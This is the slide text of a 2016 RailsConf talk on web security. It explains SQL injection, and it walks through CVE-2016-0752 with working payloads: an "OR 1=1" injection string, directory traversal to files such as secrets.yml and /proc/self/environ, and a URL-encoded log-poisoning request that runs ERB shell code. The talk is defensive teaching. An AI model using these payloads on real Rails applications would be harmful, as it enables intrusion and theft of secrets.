Embed Size (px)
Citation preview
State of Web Security
Mike Milner CTO @immunio RailsConf 2016
TodayChecked in to my flight
Read the News
Paid for Parking
Coffee with the Starbucks app
Boarding Pass Slack
Gmail
Review some Pull Requests Uber
RailsConf Schedule
Trello
Banking
Ashley Madison
Manage your corporate network
All On the Web
All On the Web
Who is protecting my data?
How?
Framework up to Date?
Libraries Patched?
Code Reviewed for Security?
Monitoring for New CVEs?
Reviewed External libraries?
Static Analysis?
Fixed Insecure Defaults?
Security is Hard
But it can be SOOO
Interesting :)
Three Types of Vulnerable Code
• Code written by you
• Code written by someone else
• Code not written
SQL Injection
• First publicly discussed in 1998. Well understood.
• Largely fixed in all web apps. Right?
"SELECT * FROM users WHERE name = '" + userName + "';"
userName = “' OR 1=1 --“
SELECT * FROM users WHERE name = ‘’ OR 1=1 --‘;
Lost 100k customers and £60m
157,000 had details stolen
Names, email addresses, passwords, and home addresses of 4,833,678 parents
200,000 kids
Email addresses, phone numbers
and dates of birth
656,723 customers
Beer Vouchers
ActiveRecord
http://rails-sqli.org/
CVE-2016-0752
“Possible Information Leak Vulnerability”
Credited to John Poulin at nVisium
https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00
Directory Traversaldef show
render params[:template]
end
Directory Traversal• /etc/passwd
• RAILS_ROOT/config/secrets.yml
• RAILS_ROOT/config/initializers/secret_token.rb
• SSL private keys
• /proc/self/environ
• /proc/<pid>/environ
Yikes!
Can We Execute Code?
“Helpful” default behaviour in Rails
Unknown extension defaults to ERB template
<%= `whoami` %>
Similar technique to CVE-2014-0130
as described by Jeff Jarmoc @ Matasano
http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf
Basics
Write code into file
Ask Rails to execute it
Getting Code into a FileRails does this for us!
/users/page?mycode=1234
Written to production.log
/users/page?mycode=%3c%25%3d%20%60%69%64%60%20%25%3e
<%= `whoami` %>
Putting it Together
/users/../../../production.log?mycode=<%= `whoami` %>
/users/%2e%2e%2f%2e%2e%2f%2e%2e%2flog%2fproduction%2elog? mycode=%3c%25%3d%20%60%69%64%60%20%25%3e
Website Ransomware
Credential Stuffing
Warranty Fraud
How to protect?• Educate Developers
• OWASP Top 10
• Stay up-to-date
• Static Analysis
• Manual Code Review
• Pen-test
Active DefenceSignature Based
Hard to maintain, Easy to bypassWAF?
Traditional Deployment
Deployments Today
RASP Runtime Application Self Protection
Active DefenceWhat was the actual exploit?
A file was read that shouldn’t be read
Shell commands were executed
Move INSIDE the app and we can see these directly
Protect against the exploit
• Uploaded images should not be executed as code
• Don’t load configuration from /tmp
• My app does NOT need to read or write anywhere inside /etc
• In fact, the app shouldn’t be writing anywhere except /tmp and /var/log
• And especially not be reading from /etc/ssl or ~/.ssh/id_rsa
Track code that opens files
Protect against the exploit
• Most apps don’t need to execute shell commands. FENCE IT OFF!
• If you do need shell, track the code that runs commands.
• The command that minifies my CSS should not be downloading and executing a perl script!
• The command that sends an invoice should not be opening a reverse shell to Russia!
• And block shell access from everywhere else.
Track shell code execution
Inside the App
Much more accurate Fewer false positives.
• SQL Queries for SQL Injection
• Template rendering for Cross Site Scripting
• Authentication attacks and Brute Forcing
• Cross Site Request Forgery
Inside the AppBetter Understanding of Vulnerabilities
• Visibility down to the line of code.
• See how bad input affects each template interpolation.
• Monitor what libraries are installed and how they’re used.
• Report gem versions that have known vulnerabilities.
Harden the App
SQL Injection with RASP
• SELECT * FROM users WHERE name = ‘Mike’
• SELECT * FROM users WHERE name = ‘’ OR 1=1 --‘;
• "SELECT * FROM users WHERE name = '" + userName + "';"
Rate Limiting
• Count volume of events in a sliding time window
• Take action when the threshold is exceeded
Three Types of Vulnerable Code
• Code written by you
• Code written by someone else
• Code not written
